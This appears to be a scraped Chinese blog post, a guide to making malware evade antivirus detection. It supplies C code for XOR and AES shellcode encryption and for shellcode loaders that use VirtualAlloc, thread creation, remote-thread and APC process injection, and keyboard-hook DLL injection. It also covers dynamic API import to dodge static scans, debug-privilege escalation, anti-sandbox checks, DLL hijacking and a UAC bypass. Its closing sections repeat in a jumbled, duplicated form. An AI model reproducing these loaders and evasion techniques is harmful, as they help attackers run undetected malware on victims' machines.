免杀技术全面指南<\/h1>

一、免杀概述<\/h2>
免杀技术是指通过各种手段使恶意程序绕过杀毒软件的检测。免杀的目的不一定是让所有杀毒软件都无法检测，而是针对特定目标机器使其无法检测。<\/p>

免杀分类<\/h3>

1. 从需求方面<\/h4>

木马免杀<\/li>
权限维持免杀<\/li>
工具免杀<\/li>

其他免杀<\/li> <\/ul>

2. 从免杀阶段方面<\/h4>

静态免杀<\/li>

动态免杀：

执行免杀<\/li>
内存免杀<\/li>
行为免杀<\/li> <\/ul> <\/li>

流量免杀<\/li> <\/ul>

3. 从payload加载方面<\/h4>

本体免杀：可执行程序直接运行，payload写死在程序中<\/li>
分离免杀：制作加载器，分离加载器和载荷<\/li>
白加黑免杀：白程序+黑DLL的加载方式<\/li>
DLL相关：各种DLL加载方式（远线程、全局钩子、HOOK、劫持）<\/li>

webshell免杀：通过变形、加密、混淆等手段<\/li> <\/ul>

4. 从编程语言方面<\/h4>

C\/C++：速度快，文件小，功能多<\/li>
Python：新手友好，但编译后文件大<\/li>
Go：速度快，简单，支持各种库<\/li>
Java：主要用于webshell免杀<\/li>
C#：常见，可在CS中使用execute-assembly直接加载<\/li>
PHP：主要用于webshell免杀<\/li>

其他语言：Rust、Nimlang、Ruby等<\/li> <\/ul>

二、载荷编码加密与对抗<\/h2>

1. 异或编码（C语言示例）<\/h3>

unsigned<\/span> char<\/span> buf[] =<\/span> "shellcode"<\/span>;
<\/span><\/span>int<\/span> password =<\/span> 1025<\/span>;
<\/span><\/span>unsigned<\/span> char<\/span> enShellCode[50000<\/span>];
<\/span><\/span>unsigned<\/span> char<\/span> deShellCode[50000<\/span>];
<\/span><\/span>int<\/span> nLen =<\/span> sizeof<\/span>(buf) -<\/span> 1<\/span>;
<\/span><\/span>
<\/span><\/span>\/\/ 加密
<\/span><\/span><\/span><\/span>for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> nLen; i++<\/span>) {
<\/span><\/span>    enShellCode[i] =<\/span> buf[i] ^<\/span> password;
<\/span><\/span>    printf("<\/span>\\<\/span>x%x"<\/span>, enShellCode[i]);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 解密
<\/span><\/span><\/span><\/span>for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> nLen; i++<\/span>) {
<\/span><\/span>    deShellCode[i] =<\/span> enShellCode[i] ^<\/span> password;
<\/span><\/span>    printf("<\/span>\\<\/span>x%x"<\/span>, deShellCode[i]);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. AES加密（C语言示例）<\/h3>
void<\/span> aes_encrypt<\/span>(const<\/span> unsigned<\/span> char<\/span> *<\/span>plaintext, int<\/span> plaintext_len, 
<\/span><\/span>                const<\/span> unsigned<\/span> char<\/span> *<\/span>key, unsigned<\/span> char<\/span> *<\/span>ciphertext) {
<\/span><\/span>    AES_KEY aes_key;
<\/span><\/span>    AES_set_encrypt_key(key, 128<\/span>, &<\/span>aes_key);
<\/span><\/span>    int<\/span> num_blocks =<\/span> plaintext_len \/<\/span> BLOCK_SIZE +<\/span> (plaintext_len %<\/span> BLOCK_SIZE ==<\/span> 0<\/span> ?<\/span> 0<\/span> :<\/span> 1<\/span>);
<\/span><\/span>    unsigned<\/span> char<\/span> block[BLOCK_SIZE];
<\/span><\/span>    for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> num_blocks; i++<\/span>) {
<\/span><\/span>        int<\/span> j;
<\/span><\/span>        for<\/span> (j =<\/span> 0<\/span>; j <<\/span> BLOCK_SIZE &&<\/span> i *<\/span> BLOCK_SIZE +<\/span> j <<\/span> plaintext_len; j++<\/span>) {
<\/span><\/span>            block[j] =<\/span> plaintext[i *<\/span> BLOCK_SIZE +<\/span> j];
<\/span><\/span>        }
<\/span><\/span>        for<\/span> (; j <<\/span> BLOCK_SIZE; j++<\/span>) {
<\/span><\/span>            block[j] =<\/span> '\0'<\/span>;
<\/span><\/span>        }
<\/span><\/span>        AES_encrypt(block, &<\/span>ciphertext[i *<\/span> BLOCK_SIZE], &<\/span>aes_key);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> aes_decrypt<\/span>(const<\/span> unsigned<\/span> char<\/span> *<\/span>ciphertext, int<\/span> ciphertext_len, 
<\/span><\/span>                const<\/span> unsigned<\/span> char<\/span> *<\/span>key, unsigned<\/span> char<\/span> *<\/span>plaintext) {
<\/span><\/span>    AES_KEY aes_key;
<\/span><\/span>    AES_set_decrypt_key(key, 128<\/span>, &<\/span>aes_key);
<\/span><\/span>    int<\/span> num_blocks =<\/span> ciphertext_len \/<\/span> BLOCK_SIZE +<\/span> (ciphertext_len %<\/span> BLOCK_SIZE ==<\/span> 0<\/span> ?<\/span> 0<\/span> :<\/span> 1<\/span>);
<\/span><\/span>    unsigned<\/span> char<\/span> block[BLOCK_SIZE];
<\/span><\/span>    for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> num_blocks; i++<\/span>) {
<\/span><\/span>        AES_decrypt(&<\/span>ciphertext[i *<\/span> BLOCK_SIZE], block, &<\/span>aes_key);
<\/span><\/span>        int<\/span> j;
<\/span><\/span>        for<\/span> (j =<\/span> 0<\/span>; j <<\/span> BLOCK_SIZE &&<\/span> i *<\/span> BLOCK_SIZE +<\/span> j <<\/span> ciphertext_len; j++<\/span>) {
<\/span><\/span>            plaintext[i *<\/span> BLOCK_SIZE +<\/span> j] =<\/span> block[j];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>三、分离载荷技术<\/h2>
1. 本地载荷读取（C语言）<\/h3>
\/\/ 读取文件
<\/span><\/span><\/span><\/span>char<\/span>*<\/span> buf =<\/span> (char<\/span>*<\/span>)malloc(926<\/span> +<\/span> 1<\/span>);
<\/span><\/span>HANDLE openinfile =<\/span> CreateFileA("aaa.txt"<\/span>,GENERIC_READ,0<\/span>,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
<\/span><\/span>int<\/span> size =<\/span> GetFileSize(openinfile, NULL);
<\/span><\/span>DWORD lpNumberOfBytesRead =<\/span> 0<\/span>;
<\/span><\/span>BOOL rfile =<\/span> ReadFile(openinfile, buf, size, &<\/span>lpNumberOfBytesRead, NULL);
<\/span><\/span>
<\/span><\/span>\/\/ 写入文件
<\/span><\/span><\/span><\/span>HANDLE hFile =<\/span> CreateFile(L<\/span>"aaa.txt"<\/span>, GENERIC_WRITE, 0<\/span>, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
<\/span><\/span>DWORD lpNumberOFBytesWrite =<\/span> 0<\/span>;
<\/span><\/span>BOOL wfile =<\/span> WriteFile(hFile, buf, size, &<\/span>lpNumberOFBytesWrite, NULL);
<\/span><\/span><\/code><\/pre>2. 远程shellcode读取<\/h3>
主要结构：<\/p>

解析路径，分析端口、资源文件、协议<\/li>
远程拉取文件读取进内存<\/li>
分配内存远程线程注入或开进程注入<\/li>
<\/ol>
HTTP请求示例：<\/p>
WinHttpOpen
<\/span><\/span>WinHttpOpenRequest
<\/span><\/span>WinHttpSendRequest
<\/span><\/span>WinHttpReceiveResponse
<\/span><\/span><\/code><\/pre>3. 读取注册表<\/h3>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    HKEY hKey;
<\/span><\/span>    char<\/span> value[255<\/span>];
<\/span><\/span>    DWORD bufSize =<\/span> sizeof<\/span>(value);
<\/span><\/span>
<\/span><\/span>    if<\/span> (RegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE<\/span>\\<\/span>Microsoft<\/span>\\<\/span>Windows<\/span>\\<\/span>CurrentVersion"<\/span>, 
<\/span><\/span>                    0<\/span>, KEY_READ, &<\/span>hKey) ==<\/span> ERROR_SUCCESS) {
<\/span><\/span>        if<\/span> (RegGetValue(hKey, NULL, "ProductName"<\/span>, RRF_RT_REG_SZ, NULL, 
<\/span><\/span>                        value, &<\/span>bufSize) ==<\/span> ERROR_SUCCESS) {
<\/span><\/span>            printf("Product Name: %s<\/span>\n<\/span>"<\/span>, value);
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            printf("Failed to read registry value.<\/span>\n<\/span>"<\/span>);
<\/span><\/span>        }
<\/span><\/span>        RegCloseKey(hKey);
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        printf("Failed to open registry key.<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>四、加载器入口点技术<\/h2>
1. VirtualAlloc直接加载<\/h3>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span><\/span>using namespace std;
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    char<\/span> shellcode[] =<\/span> "shellcode"<\/span>;
<\/span><\/span>    LPVOID lpAlloc =<\/span> VirtualAlloc(0<\/span>, sizeof<\/span> shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
<\/span><\/span>    memcpy(lpAlloc, shellcode, sizeof<\/span> shellcode);
<\/span><\/span>    ((void<\/span>(*<\/span>)())lpAlloc)();
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 创建线程运行<\/h3>
void<\/span>*<\/span> exec =<\/span> VirtualAlloc(0<\/span>, sizeof<\/span>(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
<\/span><\/span>memcpy(exec, buf, sizeof<\/span>(buf));
<\/span><\/span>CreateThread(0<\/span>, 0<\/span>, (LPTHREAD_START_ROUTINE)exec, 0<\/span>, 0<\/span>, 0<\/span>);
<\/span><\/span><\/code><\/pre>3. 远程线程加载<\/h3>
targetProcessHandle =<\/span> OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
<\/span><\/span>remoteBuffer =<\/span> VirtualAllocEx(targetProcessHandle, NULL, sizeof<\/span> shellcode, 
<\/span><\/span>                             (MEM_RESERVE |<\/span> MEM_COMMIT), PAGE_EXECUTE_READWRITE);
<\/span><\/span>WriteProcessMemory(targetProcessHandle, remoteBuffer, shellcode, sizeof<\/span> shellcode, NULL);
<\/span><\/span><\/code><\/pre>4. APC注入<\/h3>
for<\/span> (DWORD threadId : threadIds) {
<\/span><\/span>    threadHandle =<\/span> OpenThread(THREAD_ALL_ACCESS, TRUE, threadId);
<\/span><\/span>    QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);
<\/span><\/span>    Sleep(1000<\/span> *<\/span> 2<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5. HOOK键盘SetWindowHookEx代码注入<\/h3>
HMODULE library =<\/span> LoadLibraryA("Dll1.dll"<\/span>);
<\/span><\/span>HOOKPROC hookProc =<\/span> (HOOKPROC)GetProcAddress(library, "spotlessExport"<\/span>);
<\/span><\/span>HHOOK hook =<\/span> SetWindowsHookEx(WH_KEYBOARD, hookProc, library, 0<\/span>);
<\/span><\/span>Sleep(10<\/span> *<\/span> 1000<\/span>);
<\/span><\/span>UnhookWindowsHookEx(hook);
<\/span><\/span><\/code><\/pre>DLL中代码：<\/p>
extern<\/span> "C"<\/span> __declspec<\/span>(dllexport) int<\/span> spotlessExport() {
<\/span><\/span>    unsigned<\/span> char<\/span> shellcode[] =<\/span> ""<\/span>;
<\/span><\/span>    void<\/span>*<\/span> exec =<\/span> VirtualAlloc(0<\/span>, sizeof<\/span> shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
<\/span><\/span>    memcpy(exec, shellcode, sizeof<\/span> shellcode);
<\/span><\/span>    ((void<\/span>(*<\/span>)())exec)();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>五、其他技术<\/h2>
1. Bypass导入表（动态导入表）<\/h3>
typedef<\/span> LPVOID<\/span>(WINAPI*<\/span> ImportVirtualAlloc)(
<\/span><\/span>    LPVOID lpAddress,
<\/span><\/span>    SIZE_T dwSize,
<\/span><\/span>    DWORD  flAllocationType,
<\/span><\/span>    DWORD  flProtect
<\/span><\/span>    );
<\/span><\/span>ImportVirtualAlloc MyVirtualAlloc =<\/span> (ImportVirtualAlloc)GetProcAddress(
<\/span><\/span>    GetModuleHandle(TEXT("kernel32.dll"<\/span>)), "VirtualAlloc"<\/span>);
<\/span><\/span><\/code><\/pre>2. 获取进程令牌权限<\/h3>
HANDLE hToken;
<\/span><\/span>TOKEN_PRIVILEGES TokenPrivileges;
<\/span><\/span>BOOL bResult;
<\/span><\/span>
<\/span><\/span>bResult =<\/span> OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &<\/span>hToken);
<\/span><\/span>bResult =<\/span> LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &<\/span>TokenPrivileges.Privileges[0<\/span>].Luid);
<\/span><\/span>TokenPrivileges.PrivilegeCount =<\/span> 1<\/span>;
<\/span><\/span>TokenPrivileges.Privileges[0<\/span>].Attributes =<\/span> SE_PRIVILEGE_ENABLED;
<\/span><\/span>bResult =<\/span> AdjustTokenPrivileges(hToken, FALSE, &<\/span>TokenPrivileges, 
<\/span><\/span>                              sizeof<\/span>(TOKEN_PRIVILEGES), NULL, NULL);
<\/span><\/span><\/code><\/pre>3. 判断当前权限<\/h3>
#include<\/span> <ShlObj.h><\/span>
<\/span><\/span><\/span>#include<\/span> <tchar.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> _tmain<\/span>() {
<\/span><\/span>    BOOL bIsAdmin =<\/span> IsUserAnAdmin();
<\/span><\/span>    if<\/span> (bIsAdmin)
<\/span><\/span>        _tprintf_s(_T("Run As administrator"<\/span>));
<\/span><\/span>    else<\/span>
<\/span><\/span>        _tprintf_s(_T("Run As user"<\/span>));
<\/span><\/span>    system("pause"<\/span>);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. 反沙箱技术<\/h3>

读取注册表<\/li>
判断CPU、内存等硬件信息<\/li>
检测进程<\/li>
延时执行<\/li>
<\/ul>
六、白加黑技术<\/h2>
白加黑技术是指利用合法的白程序加载恶意的黑DLL执行。<\/p>
白加黑分类<\/h3>


加载不存在的DLL<\/p>

利用LoadLibrary或LoadLibraryEx API<\/li>
DLL不需要任何导出函数即可被加载<\/li>
<\/ul>
<\/li>

加载存在的DLL<\/p>

替换或劫持系统已有的DLL<\/li>
<\/ul>
<\/li>
<\/ol>
DLL加载顺序<\/h3>

EXE所在目录<\/li>
当前目录(GetCurrentDirectory())<\/li>
系统目录(GetSystemDirectory())<\/li>
WINDOWS目录(GetWindowsDirectory())<\/li>
环境变量PATH包含的目录<\/li>
<\/ol>
示例：Obsidian的DLL劫持<\/h3>

找到需要LoadLibrary的DLL<\/li>
编写恶意DLL放到和程序同目录<\/li>
运行程序自动调用恶意DLL<\/li>
<\/ol>
七、工具免杀<\/h2>

将可执行文件转换为shellcode再加载<\/li>
对于fscan、frp等工具：

修改流量特征<\/li>
修改运行参数<\/li>
行为免杀<\/li>
<\/ul>
<\/li>
<\/ol>
八、其他功能<\/h2>
Bypass UAC<\/h3>
通过允许的应用程序提升权限激活COM类，使用ICMLuaUtil的ShellExec创建进程。<\/p>
允许的进程包括：<\/p>

记事本<\/li>
计算器<\/li>
资源管理器<\/li>
rundll32.exe<\/li>
<\/ul>
九、注意事项<\/h2>

不同语言编译有不同的参数命令，影响免杀效果<\/li>
了解主要杀毒软件的规则<\/li>
测试时断网<\/li>
不要直接将样本上传到VirusTotal<\/li>
<\/ol>
总结<\/h2>
免杀技术主要围绕分离免杀和加载器设计，结合编码混淆技术。APT组织常用多层调用和分段加密技术，使取证分析更加困难。建议深入研究调试技术，而不仅仅是编译运行现有项目。<\/p>

免杀技术全面指南<\/h1>

一、免杀概述<\/h2> 免杀技术是指通过各种手段使恶意程序绕过杀毒软件的检测。免杀的目的不一定是让所有杀毒软件都无法检测，而是针对特定目标机器使其无法检测。<\/p>

免杀分类<\/h3>

二、载荷编码加密与对抗<\/h2>

三、分离载荷技术<\/h2>

四、加载器入口点技术<\/h2>

五、其他技术<\/h2>

六、白加黑技术<\/h2> 白加黑技术是指利用合法的白程序加载恶意的黑DLL执行。<\/p>

八、其他功能<\/h2>

总结<\/h2> 免杀技术主要围绕分离免杀和加载器设计，结合编码混淆技术。APT组织常用多层调用和分段加密技术，使取证分析更加困难。建议深入研究调试技术，而不仅仅是编译运行现有项目。<\/p>

一、免杀概述<\/h2>
免杀技术是指通过各种手段使恶意程序绕过杀毒软件的检测。免杀的目的不一定是让所有杀毒软件都无法检测，而是针对特定目标机器使其无法检测。<\/p>

六、白加黑技术<\/h2>
白加黑技术是指利用合法的白程序加载恶意的黑DLL执行。<\/p>

总结<\/h2>
免杀技术主要围绕分离免杀和加载器设计，结合编码混淆技术。APT组织常用多层调用和分段加密技术，使取证分析更加困难。建议深入研究调试技术，而不仅仅是编译运行现有项目。<\/p>